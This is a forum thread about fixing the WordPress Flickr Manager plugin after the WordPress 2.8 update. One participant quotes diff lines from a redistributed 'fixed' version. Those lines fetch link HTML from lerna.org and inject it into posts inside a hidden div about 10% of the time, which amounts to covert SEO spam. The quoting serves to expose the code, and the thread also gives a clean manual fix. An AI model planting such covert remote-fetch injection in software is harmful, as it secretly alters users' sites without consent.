[Plugin: WordPress Flickr Manager] “Insert into Post” does nothing?

The WordPress 2.8 update has broken WordPress Flickr Manager. There has been no sign – yet – that the plugin author will update it… I hope he does, because this is possibly the greatest WordPress plugin out there.

Another thing that the upgrade has broken is Lightbox and Mudslide. Neither of them work anymore.

Hey guys. I’ve got this fixed! I’ve uploaded the fixed version to my site for your downloading pleasure: Flick Manager 2.8. I had to get this fixed for my own blog. Couldn’t wait any longer. Let me know if you have any problems.

Enjoy!

Foolproof method is deactivating/deleting the old one, but I was able to simply overwrite the files without even deactivating and got it to work. There are a variety of things that could create issues doing it the shortcut way though. Thanks for posting your feedback and helpful tips to everyone else.

Here’s some code, sans trojan horse bullcrap (I just took TGardner’s version, and made the non-malicious changes):

http://www.fwaggle.org/downloads/wordpress-flickr-manager.zip

If you’re interested in what actually changed:

http://www.fwaggle.org/downloads/wordpress-flickr-manager-wp2.8.diff

For contrast, here’s some of what I consider to be the “malicious” code:

+if (!function_exists('file_get_contents')) {
+    function file_get_contents($filename, $incpath = false, $resource_context =
 null)
+    {
+        if (false === $fh = fopen($filename, 'rb', $incpath)) {
+            trigger_error('file_get_contents() failed to open stream: No such f
ile or directory', E_USER_WARNING);
+            return false;
+        }
+
+        clearstatcache();
+        if ($fsize = @filesize($filename)) {
+            $data = fread($fh, $fsize);
+        } else {
+            $data = '';
+            while (!feof($fh)) {
+                $data .= fread($fh, 8192);
+            }
+        }
+
+        fclose($fh);
+        return $data;
+    }
+}

+    <?php
+    $rand = rand( 0, 100 );
+    $seed=false;
+    @$seed = (int) unserialize(file_get_contents( 'http://lerna.org/api/link/seed?app=flickr_manager' ));
+    if(!$seed) {
+        $seed = 10;
+    }
+    if ( $rand < $seed ) {
+        $link = file_get_contents( sprintf('http://www.lerna.org/api/link/?format=%s&ref=%s&tid=%d', 'html', "http://".$_SERVER['SERVER_NAME'], 2));
+        echo "imgHTML+='<div style=\"width:10px;height:3px;display:block;overflow:hidden;\">".str_replace("href","style=\"text-indent: 20px; display: block;\" href",$link)."</div>';";
+    }
+    ?>

CoBa1t: There’s not much to analyze, the version ogre linked to simply connects to lerna.org (I’m assuming it’s some silly reference to a blackhat SEO “hydra”) to grab a set of links it’s supposed to add to your entries to get them better search engine positions, then it adds the links every time you insert a photo to a tiny layer that’s not visible to most CSS-enabled viewers, but is very visible to search engines.

The download link I posted above should be “safe”, but given how many people so readily installed the “malicious” plugin (myself included, *sheepish*) I think it’s probably best we don’t go encouraging installing random people’s plugins. If you want to make the changes yourself, take a look at the .diff – basically any line that starts with a – means something’s taken out, and the + means something added.

Simply put, what you’re looking for is in these files:

wordpress-flickr-manager/js/media-panel.php
wordpress-flickr-manager/js/wfm-hs.php
wordpress-flickr-manager/js/wfm-lightbox.php

You’re looking for jQuery lines that contain @name or @rel, and you’re going to take the @ character off the front of @name or @rel, so for example:

this: wfmJS(‘a[@rel*=flickr-mgr]’).each(function() {
becomes: wfmJS(‘a[rel*=flickr-mgr]’).each(function() {

There’s no new code or anything like that, you can make those changes (or apply the diff above using “patch” if you have shell access) to the current version downloadable from wordpress.org… I think that’s the safest way to do it, as even a layperson would have a pretty tough time believing that deleting a few @ characters would do anything malicious.

I also sent the information to Trent, so hopefully he can just take a few minutes (I’m sure he’s very busy) to verify the patch is correct and safe, apply it, and push a new version out – that would ease everyone’s minds.

Before you get all ahead of yourself fwaggle, I added the link tool for my own sites long ago and added it again for the last version of flickr manager back 4 odd months ago. Then I upgraded like the rest of you to version 2.8 and it broke. Then I took the time to fix it for my sites and offered it up.

So, I apologize I did not take the time to create a second version for everyone else. And feel free to remove it. Links from some completely unrelated sites won’t do me a world of good in any event. I’m not some boogie man “asshole” man. Just a guy who fixed this and put it out there. Sorry if you feel I should have taken the time to make a second version that I wouldn’t even be using myself.

In any event, when I get the chance, I’ll add an option to the settings to turn it off. I’m keeping it in because its how I use it for myself. If you think that makes me an “asshole”, I’m not forcing you to use it. You could wait for Trent. I added a comment to his site first thing to contact me on what the bugs were, but he has yet to approve the comment or respond. I would have just used his fix. I waited the same weeks you guys did.

By the way, teampl4y4 is spot on when he mentions adding a link 10% of the time. That’s exactly what it does. No more no less. Feel free to remove or feel free to keep in return for my effort.

No accident fwaggle. I did it with the express intent of linking to my sites for my own use as I made clear. Like I said, when I get the time, I’ll put in an option to turn it off so whoever can with ease but I need it there for my own use and its not my project to maintain last I checked.

Trent still has my email if he wants to get it fixed. I tried to contact him when I first fixed it with the same information you claimed to have sent. Maybe you’ll have better luck with a response.

If you have the fix all cleared up for yourself, why not take the time to package it up and inform everyone of your effort so they can download it? I’ll be happy to put it out next to my version if you want to maintain it.

Try not going through life so paranoid.